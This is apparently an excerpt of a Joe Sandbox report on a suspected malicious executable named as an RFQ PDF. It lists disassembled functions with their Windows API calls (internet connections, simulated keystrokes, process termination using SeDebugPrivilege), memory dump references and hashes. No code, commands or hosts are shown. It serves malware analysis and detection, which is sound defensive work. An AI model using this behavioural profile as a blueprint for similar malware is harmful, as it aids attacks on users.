                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3210457359-0
                                                                                                                • Opcode ID: 7af0374c2992d9de3ed89dc553b06ec3c0dc31a8ca2333fcbed365a6374c3c7f
                                                                                                                • Instruction ID: 7861f4e6496c3dc3e42d4c8ab798d136375a180b0adf6855a4eb31e20824762b
                                                                                                                • Opcode Fuzzy Hash: 7af0374c2992d9de3ed89dc553b06ec3c0dc31a8ca2333fcbed365a6374c3c7f
                                                                                                                • Instruction Fuzzy Hash: FF516D30E41A09BEEB20AF74CC49BD93B75BB05361F544213FA269A3E0C7759988DB40
                                                                                                                Function 00A58B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A96890
                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A968A9
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A968B9
                                                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A968D1
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A968F2
                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A58874,00000000,00000000,00000000,000000FF,00000000), ref: 00A96901
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A9691E
                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A58874,00000000,00000000,00000000,000000FF,00000000), ref: 00A9692D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268354404-0
                                                                                                                • Opcode ID: cf95eebf3ca7d72119743094c3b02fcb1a1037f5e0ddbb73c3215062ed26c703
                                                                                                                • Instruction ID: c99d53afb1342f95946f9fe62871f68da39a30eef87fcba0f98b39236e1807b2
                                                                                                                • Opcode Fuzzy Hash: cf95eebf3ca7d72119743094c3b02fcb1a1037f5e0ddbb73c3215062ed26c703
                                                                                                                • Instruction Fuzzy Hash: A55187B0600209EFDB20CF28CC55FAA7BB9FF48761F108519F952A72A0DB74E991DB40
                                                                                                                Function 00ABC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ABC182
                                                                                                                • GetLastError.KERNEL32 ref: 00ABC195
                                                                                                                • SetEvent.KERNEL32(?), ref: 00ABC1A9
                                                                                                                  • Part of subcall function 00ABC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ABC272
                                                                                                                  • Part of subcall function 00ABC253: GetLastError.KERNEL32 ref: 00ABC322
                                                                                                                  • Part of subcall function 00ABC253: SetEvent.KERNEL32(?), ref: 00ABC336
                                                                                                                  • Part of subcall function 00ABC253: InternetCloseHandle.WININET(00000000), ref: 00ABC341
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 337547030-0
                                                                                                                • Opcode ID: eb3b953f5304ca985becea80534b96c50b21a8f438c4ff06119b4290d446e5c6
                                                                                                                • Instruction ID: 324092b35811bc9e5a297b0b2d4d9b57bd74e004531858eea87be4770025f230
                                                                                                                • Opcode Fuzzy Hash: eb3b953f5304ca985becea80534b96c50b21a8f438c4ff06119b4290d446e5c6
                                                                                                                • Instruction Fuzzy Hash: DF318971201602AFDB21AFE59D04EE6BBFDFF58320B00451EF95A86612D730E811DBA0
                                                                                                                Function 00AA25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA3A57
                                                                                                                  • Part of subcall function 00AA3A3D: GetCurrentThreadId.KERNEL32 ref: 00AA3A5E
                                                                                                                  • Part of subcall function 00AA3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AA25B3), ref: 00AA3A65
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AA25BD
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AA25DB
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00AA25DF
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AA25E9
                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AA2601
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00AA2605
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AA260F
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AA2623
                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00AA2627
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                • Opcode ID: 47900441bc1de80d5b89f94cb13c2845222a9391ba601dda85ba983129e5883f
                                                                                                                • Instruction ID: 528a873d0275f1e389ce620c83ea89c8c3592de49e2af71b3e8a8756fc135383
                                                                                                                • Opcode Fuzzy Hash: 47900441bc1de80d5b89f94cb13c2845222a9391ba601dda85ba983129e5883f
                                                                                                                • Instruction Fuzzy Hash: 3A01D831790321BBFF10A7A89C8AF593F59DB4EB61F500012F315AF0D1CAE25445CA69
                                                                                                                Function 00AA1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00AA1449,?,?,00000000), ref: 00AA180C
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00AA1449,?,?,00000000), ref: 00AA1813
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AA1449,?,?,00000000), ref: 00AA1828
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00AA1449,?,?,00000000), ref: 00AA1830
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00AA1449,?,?,00000000), ref: 00AA1833
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AA1449,?,?,00000000), ref: 00AA1843
                                                                                                                • GetCurrentProcess.KERNEL32(00AA1449,00000000,?,00AA1449,?,?,00000000), ref: 00AA184B
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00AA1449,?,?,00000000), ref: 00AA184E
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00AA1874,00000000,00000000,00000000), ref: 00AA1868
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1957940570-0
                                                                                                                • Opcode ID: 5ef08e6556388f5096cabc8a8708cf66d1e1f50066b9df478ceaf6d3cea641fd
                                                                                                                • Instruction ID: 31890b01378d511c187ddd2e543d9a16eeab6a4c918d1f33970b0be134dccba2
                                                                                                                • Opcode Fuzzy Hash: 5ef08e6556388f5096cabc8a8708cf66d1e1f50066b9df478ceaf6d3cea641fd
                                                                                                                • Instruction Fuzzy Hash: 2201BBB5281319BFE710EBA5DC4DF6B7BACEB89B11F404511FA15DB1A1CA749801CB20
                                                                                                                Function 00ACA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AAD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00AAD501
                                                                                                                  • Part of subcall function 00AAD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00AAD50F
                                                                                                                  • Part of subcall function 00AAD4DC: CloseHandle.KERNEL32(00000000), ref: 00AAD5DC
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ACA16D
                                                                                                                • GetLastError.KERNEL32 ref: 00ACA180
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ACA1B3
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00ACA268
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00ACA273
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACA2C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                • Opcode ID: 0b1c3b7eac6d14bb40b1ede1b1e206f7855075cd67cddfb9943a23aa221d0262
                                                                                                                • Instruction ID: 0ea385f749d11c4c43002d57b60fb61b2adf5e92ca1f401ba26c065cef064a38
                                                                                                                • Opcode Fuzzy Hash: 0b1c3b7eac6d14bb40b1ede1b1e206f7855075cd67cddfb9943a23aa221d0262
                                                                                                                • Instruction Fuzzy Hash: 4261BE342052429FD720DF18C494F65BBE1AF54318F19848CE46A8F7A3C776EC49CB82
                                                                                                                Function 00AD3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AD3925
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AD393A
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AD3954
                                                                                                                • _wcslen.LIBCMT ref: 00AD3999
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AD39C6
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AD39F4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcslen
                                                                                                                • String ID: SysListView32
                                                                                                                • API String ID: 2147712094-78025650
                                                                                                                • Opcode ID: 455a6a01a9791d102a7c435cc1856945c9c294aaf28f8dbe1700e230c6744b06
                                                                                                                • Instruction ID: 1c23a2cd4bf2dd817139edb8cb4480a3b7bd7663ba037d80a954afda482e1f82
                                                                                                                • Opcode Fuzzy Hash: 455a6a01a9791d102a7c435cc1856945c9c294aaf28f8dbe1700e230c6744b06
                                                                                                                • Instruction Fuzzy Hash: 3241A272A00219ABEF219F64CC49BEE7BA9EF08350F100567F959E7291D775DA80CB90
                                                                                                                Function 00AABC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AABCFD
                                                                                                                • IsMenu.USER32(00000000), ref: 00AABD1D
                                                                                                                • CreatePopupMenu.USER32 ref: 00AABD53
                                                                                                                • GetMenuItemCount.USER32(01165760), ref: 00AABDA4
                                                                                                                • InsertMenuItemW.USER32(01165760,?,00000001,00000030), ref: 00AABDCC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                • String ID: 0$2
                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                • Opcode ID: ec31a516f6b50ae22374d0dd90909c10286af8337a8d2415d21c08a290c050d2
                                                                                                                • Instruction ID: 6aa8c9c3b6e9e52f2f70b3ae0b1dfa278acb5fdca9f5107fe28d02a9598b0261
                                                                                                                • Opcode Fuzzy Hash: ec31a516f6b50ae22374d0dd90909c10286af8337a8d2415d21c08a290c050d2
                                                                                                                • Instruction Fuzzy Hash: 53519D70A103059BDF21DFB8D984BAEBBF4BF46324F14425AE411AB2D2D7709945CB71
                                                                                                                Function 00AAC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00AAC913
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: d1187c4f5555640383c33d80b7ba260ef2354fbf2c81379070f31206f534cb01
                                                                                                                • Instruction ID: f17ad99616a6009061ad8a659cb70a364fbfe37d488f3d3c352413e8b667a685
                                                                                                                • Opcode Fuzzy Hash: d1187c4f5555640383c33d80b7ba260ef2354fbf2c81379070f31206f534cb01
                                                                                                                • Instruction Fuzzy Hash: 5411E736689306BAF7019B549D82DAB77ECDF2A774B60006EF900A72C2E7A49E005265
                                                                                                                Function 00AAED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 952045576-0
                                                                                                                • Opcode ID: baf8e9bd1e3cca2043c8b826898b6ddb352137a98e665f9f6d22c1758877a787
                                                                                                                • Instruction ID: 6ca9631f2c1bfae3432c85926ef240cf86470be5a90180e98b52a5eeb3febcf2
                                                                                                                • Opcode Fuzzy Hash: baf8e9bd1e3cca2043c8b826898b6ddb352137a98e665f9f6d22c1758877a787
                                                                                                                • Instruction Fuzzy Hash: C641A166D1021876DB21EBF4CC8A9CFB7BCAF46710F508462E518E3162FB34E255C3A6
                                                                                                                Function 00A5F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A9682C,00000004,00000000,00000000), ref: 00A5F953
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A9682C,00000004,00000000,00000000), ref: 00A9F3D1
                                                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A9682C,00000004,00000000,00000000), ref: 00A9F454
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: 779bdbb316147ccb7fcf2c2eafec8cc7fbf02491d7071fc5a44ae7d31d98413b
                                                                                                                • Instruction ID: 5c0b368cf2142c7e5e75d94b6979d329f560499c41c44c5911b5c8271bba53ff
                                                                                                                • Opcode Fuzzy Hash: 779bdbb316147ccb7fcf2c2eafec8cc7fbf02491d7071fc5a44ae7d31d98413b
                                                                                                                • Instruction Fuzzy Hash: A0415E31304A80FECB348B3CCD8876B7BE1BB86362F54443DE85797560D632A889C711
                                                                                                                Function 00AD2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AD2D1B
                                                                                                                • GetDC.USER32(00000000), ref: 00AD2D23
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AD2D2E
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00AD2D3A
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AD2D76
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AD2D87
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AD5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00AD2DC2
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AD2DE1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                • Opcode ID: 8ad02fdcc4f15039248acbbe10d038d4f9743a19d0d1481ac0f3cc4ab622a2b0
                                                                                                                • Instruction ID: 54e39578a2dc86861a975db033ebd1cf91d4a087793c210d89687e152c31328a
                                                                                                                • Opcode Fuzzy Hash: 8ad02fdcc4f15039248acbbe10d038d4f9743a19d0d1481ac0f3cc4ab622a2b0
                                                                                                                • Instruction Fuzzy Hash: A531AE72202214BFEB118F50CC8AFEB3FADEF19721F044056FE4A9A291C6759C41CBA0
                                                                                                                Function 00AA5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
